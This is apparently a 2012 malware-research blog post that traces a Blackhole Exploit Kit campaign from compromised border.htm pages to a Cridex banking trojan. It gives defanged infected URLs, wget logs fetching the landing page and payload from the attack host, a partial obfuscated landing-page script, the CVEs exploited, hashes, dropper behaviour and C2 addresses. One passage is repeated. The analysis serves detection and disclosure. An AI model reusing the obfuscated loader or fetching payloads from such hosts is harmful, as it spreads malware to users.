It is a quicky, and since the bad guys is also monitoring us now I'll make it short. Found new update of BHEK2 trends. In the past 2days during ddos storm these landing pages NEW infections had appeared, a large infections of border.htm files has been spotted everywhere. Storms made us slow in detecting these, by the time we found it the infection was already deep spreaded, it was at the time we decided to end the last crusade. So this is the last battle's report:
h00p://regioneconomrazvitie.ru/border.htm h00p://alfa-opora.ru/border.htm h00p://brandonchurch.ca/border.htm h00p://carobnoselo.co.rs/border.htm h00p://downendchristadelphians.org.uk/border.htm h00p://dstamac.com/border.htm h00p://hopsshack.com/border.htm h00p://kotkankoiraystavainseura.fi/border.htm h00p://ncrg.info/border.htm h00p://orejitassanas.com/border.htm h00p://techjamcincinnati.org/border.htm h00p://www.binarius.pt/border.htm h00p://www.burghotel-bad-belzig.de/border.htm h00p://www.eetrans.ru/border.htm h00p://www.kulich.hu/border.htm h00p://www.mvlcs.org/border.htm h00p://www.partylooxx.nl/border.htm h00p://www.resgroup.com/border.htm h00p://www.ribon.ro/border.htm h00p://www.rzua.org/border.htm h00p://www.s-a-n.nl/border.htm h00p://www.schwabinger-ernaehrungsstudio.de/border.htm h00p://www.su-woerschach.at/border.htm h00p://www.szhuaheng.com/border.htm h00p://www.usv-gaweinstal.at/border.htm h00p://центрцен.рф/border.htmWith some formula we can grab all samples w/o problems:
--23:12:50-- h00p://secondhand4u.ru:8080/forum/links/column.php
=> `column.php'
Resolving secondhand4u.ru... 209.51.221.247, 72.18.203.140, 203.80.16.81
Connecting to secondhand4u.ru|209.51.221.247|:8080... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.0 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 14:08:38 GMT
Content-Type: text/html; charset=CP-1251
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Vary: Accept-Encoding
Via: 1.0 localhost (squid/3.1.6)
Proxy-Connection: close
Length: unspecified [text/html]
23:12:53 (49.74 KB/s) - `column.php' saved [28835]
File looks like:
$ ls -alF column.php -rwx------ 1 malware mustdie 28835 Oct 21 05:12 column.php*The data itself contains malc0de as below snips:
<html><head><title></title></head><body><div dqa="
665b686966^621e5c6h6h_6h6h665b68$6966621e62(696060
25#2a5b6c5b59*2458253462!6960603566^5b68696662_1e5
63!62685b6c68^252525256f_5f5c241f5h$6g6g1f245h(2a6
2c6h6h#354860695" 57="96268+37586h5f5c%245829612a)
:
:
85b$625b66245a(2859285c57@60675b256h&5b60675b6f+5f
58&2a5a5" 8="362595768$24511g2c1g(281g2c1g28@1g2c1
$25512c536g(6g5g2a5863@5a6d25355f&5c245d256f+5f5c2
a245725#256f57371g*1g6h5f5c24!5h2a5f674b^68665f625
43d3b32!3b3331322c^292e322c3e_2" 16="725256f@5f5c2
2a665b)575a6d4b68#57685b3737*2g25256f5f!5c241f612a
5b62^5d685e2222_592a4f445c$6962596751(592a4f445c@6
if(window.document){if(021==0x11)d=window.document
try{asd3*f2}catch(dsgdsg){a=d[g](ggg);}
s="";
for(i=0;;i++){
asd2();
if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x12;
for(i=0;i<a.length;i+=2){
asd5();
}
asd();}
</script></body></html>
With the hexed complete data is here:--->>[PASTEBIN]
As usual it can be deobfs into PluginDetect here:--->>[PASTEBIN]
Which can alternatively be decoded manually like this:---->>[PASTEBIN]
Shortly, this border.htm infections case are using same PluginDetect which infection of Cridex
(we thought was Zbot) with the below steps :
1. Lead to h00p://secondhand4u[.]ru:8080/forum/links/column[.]php
2. Using function (c, b, a) + catching these parameters for Exploits = {d,f,h,m.i.e}
3. Makes you downloads exploit PDF(CVE-2010-0188) & jar component. jar exploits with CVE-2012-0507, flooding AtomicReferenceArray & using cracking singleton method to bypass JRE environment (used IllegalArgumentException, SecurityException, InstantiationException,etc) and push url download command to download a trojan dropper, Our PoC during analyzing jar code is as per snipped below:
IMPORTANT NOTE: This Jar infection marks the first time the BHEK authors have used two forms of obfuscation in the param value field.
The full details of JAR decoded is in here:-->>[MMDCrackTeamBlog] Through PDF & JAR exploits downloads trojan/dropper "via" below urls forms:
(there's a direct download link too but sorry we're not going to expose it here..)
2. Using function (c, b, a) + catching these parameters for Exploits = {d,f,h,m.i.e}
3. Makes you downloads exploit PDF(CVE-2010-0188) & jar component. jar exploits with CVE-2012-0507, flooding AtomicReferenceArray & using cracking singleton method to bypass JRE environment (used IllegalArgumentException, SecurityException, InstantiationException,etc) and push url download command to download a trojan dropper, Our PoC during analyzing jar code is as per snipped below:
IMPORTANT NOTE: This Jar infection marks the first time the BHEK authors have used two forms of obfuscation in the param value field. The full details of JAR decoded is in here:-->>[MMDCrackTeamBlog] Through PDF & JAR exploits downloads trojan/dropper "via" below urls forms:
(there's a direct download link too but sorry we're not going to expose it here..)
h00p://secondhand4u.ru:8080/forum/links/column.php?hqc=350a050538&pcxii=3307093738070736060b&nkwrjmje=04&dpgqcro=ebsvhag&avw=qxkszjzu h00p://secondhand4u.ru:8080/forum/links/column.php?sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03&vjydansz=ctqdpz&jdrht=jkdu h00p://secondhand4u.ru:8080/forum/links/column.php?zf=3436353638&oe=3307093738070736060b&n=02&re=e&mk=k
Not only PDF/JAR, PluginDetect will hit you with CVE-2006-0003 (MDAC) w/ActiveX Object : BD96C556-65A3-11D0-983A-00C04FC29E36 to drop trojan malware via msxml2.XMLHTTP to your PC with API: SaveToFile .//..//SOMETHING.exe) As you can see, a triple hit exploit, to same Cridex payload.
4. ↑that PDF and Jar files we post in VT is as per below VT details:
Jar: https://www.virustotal.com/file/c24b87d6580b21e39f744a77babdd317d5aa8a94bdadeb5edde9f018a50fb093/analysis/ PDF: https://www.virustotal.com/file/ed3ae7ef961218a165c3fda730d88d871fe0f0a00693958f3bdc4f55cdef03c6/analysis/5. You will get exploited by above details & brings you to saved trojan in exe file as, per below PoC:
--01:04:06-- h00p://secondhand4u.ru:8080/forum/links/column.php?sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03&vjydansz=ctqdpz&jdrht=jkdu
=> `column.php@sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03
&vjydansz=ctqdpz&jdrht=jkdu'
Resolving secondhand4u.ru... 72.18.203.140, 203.80.16.81, 209.51.221.247
Connecting to secondhand4u.ru|72.18.203.140|:8080... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.0 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 22:43:38 GMT
Content-Type: application/x-msdownload
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 21 Oct 2012 14:22:22 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 87040
Connection: close
Length: 87,040 (85K) [application/x-msdownload]
100%[====================================>] 87,040 108.56K/s
01:04:10 (108.42 KB/s) - `calc.exe' saved [87040/87040]
VT shows:
MD5: 8e4e7c4bb9908a9488a1be96c5eb230f
File size: 85.0 KB ( 87040 bytes )
File name: calc.exe
File type: Win32 EXE
Tags: peexe
Detection: 29 / 43
Date: 2012-10-21 15:17:14 UTC ( 55 分 ago )
URL: https://www.virustotal.com/file/05bc5c346488c55fe91b80dea9dc7ef3c66210b9f4981918b6623ba3c3518bf6/analysis/
6. Dropped/Self Copied Trojan:
It dropped itself and saved it in %AppData% folder.
Dropper & Memory Inject API / Reversing + Behavior PoC is:
(1) PID: 0x4ac File: C:\calc.exe Address: 0x4079ce CopyFileW( lpExistingFileName: "C:\calc.exe", lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", bFailIfExists: 0x0); (2) PID: 0x674 File: C:\Documents and Settings\User\Application Data\KB00085031.exe" Address: 0x403822 CreateRemoteThread (hProcess: 0x78, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0xe5eca0, lpParameter: 0xe50000, dwCreationFlags: 0x0, lpThreadId: 0x0);PS: original PE sample also self-deleted.
The dropped Trojan (payload) is :
MD5: e86d8403f74bd18de027996abae4156a
File size: 84.5 KB ( 86528 bytes )
File name: KB01428194.exe
File type: Win32 EXE
Tags: peexe
Detection: 9 / 43
Date: 2012-10-21 14:48:59 UTC ( 1 時間, 26 分 ago )
URL: https://www.virustotal.com/file/4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb/analysis/1350830939/
According to the new feature "Behavioutal Information" of VT, this payload trojan did:
Written files... C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat (successful) Copied files... SRC: C:\4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb DST: C:\Documents and Settings\ \Application Data\KB00927107.exe (successful) Deleted files... C:\4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb (successful) C:\DOCUME~1\ ~1\LOCALS~1\Temp\exp1.tmp.bat (successful) Created processes... C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ ~1\LOCALS~1\Temp\exp1.tmp.bat"" (successful) C:\Documents and Settings\ \Application Data\KB00927107.exe (successful) Code injections in the following processes... python.exe (successful) VBoxTray.exe (successful)
We just finished full behavior test of the dropped Trojan, PoC:(additional) According to Contagio is a Cridex: (thanks to @snowfl0w)7. The network analysis can be seen here:--->>[PASTEBIN] With the summary as per below:
7.1. It requested handshake to 3(three) remote IP: 188.40.0.138 203.217.147.52 and 41.168.5.140 // I tried this 5 times, same pattern.. no miss.. 7.2. It established connection with 41.168.5.140 7.3. Send POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 contains encryption. 7.4. See below for the sample of each unique packet we trapped (Suspected crypted credentials on outgoing packets
8. The registry analysis can be seen here: --->>[PASTEBIN] With the summary as per below:
8.1. Autorun of the dropped trojan 8.2. Cannot expose further yet but many chipers are registered. 8.8. Suspected screenshot templates detected:9. The CNC was solved as per this report:--->>[PASTEBIN] by our member :-)..\WinPos1024x768(1).left: 0x000000C0 ..\WinPos1024x768(1).left: 0x0000006E ..\WinPos1024x768(1).top: 0x00000027 ..\WinPos1024x768(1).top: 0x0000008A ..\WinPos1024x768(1).right: 0x000003E0 ..\WinPos1024x768(1).right: 0x0000038E ..\WinPos1024x768(1).bottom: 0x0000027F ..\WinPos1024x768(1).bottom: 0x000002E2 ..\WinPos1024x768(1).left: 0x000000C0 ..\WinPos1024x768(1).left: 0x0000006E ..\WinPos1024x768(1).top: 0x00000027 ..\WinPos1024x768(1).top: 0x0000008A ..\WinPos1024x768(1).right: 0x000003E0 ..\WinPos1024x768(1).right: 0x0000038E ..\WinPos1024x768(1).bottom: 0x0000027F ..\WinPos1024x768(1).bottom: 0x000002E2 :
@malwaremustdie nice work. in your last post MD5: e86d8403f74bd18de027996abae4156a does not look like zbot. I'd say its cridex.
— snowfl0w (@snowfl0w) October 21, 2012
As the trophy of the current findings is the head of these malwares as per -
below family pic:-)
We are also requested the sample of the current infections by researchers.
Contagio looks busy, so you can download here:--->>[SAMPLE-SET]
(Mention us in twitter for password request)
Cridex Reference: M86 - The Cridex Trojan Targets 137 Financial Organizations in One Go Stop Malvertising - Analysis of Cridex DeepEnd Research - Blackhole & Cridex: Se2 Ep1: Intuit Spam & SSL traffic analysis Contagio - Cridex Analysis using Volatility - by Andre' DiMino Kahu Security - Spear-Phish Leads to Cridex #MalwareMustDie!
